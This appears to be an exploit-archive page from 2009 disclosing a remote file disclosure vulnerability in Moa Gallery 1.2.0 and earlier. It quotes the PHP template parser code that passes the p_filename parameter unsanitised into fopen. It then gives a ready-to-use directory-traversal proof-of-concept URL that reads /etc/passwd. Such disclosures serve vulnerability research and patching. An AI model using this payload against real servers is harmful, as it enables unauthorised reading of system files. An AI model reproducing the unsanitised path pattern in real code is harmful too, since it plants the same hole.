[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Moa Gallery <= 1.2.0 (p_filename) Remote File Disclosure Vulnerability
# Published : 2009-08-26
# Author : GoLd_M
# Previous Title : TotalCalendar 2.4 (bSQL/LFI) Multiple Remote Vulnerabilities
# Next Title : Simple CMS FrameWork <= 1.0 (page) Remote SQL Injection Vuln
Moa Gallery <= 1.2.0 Remote File Disclosure Vulnerability
Code In sources_template_parser.php
$filename = $MOA_PATH."templates/".$template_name."/".$p_filename;
$fp = @fopen($filename, "r");
if ((!$fp) && (is_bool($fp)))
{
$fp = $fp = @fopen($MOA_PATH."templates/MoaDefault/".$p_filename, "r");
POC
/sources/_template_parser.php?p_filename=../../../../../../../../../../../../../../../etc/passwd
# www.Syue.com [2009-08-26]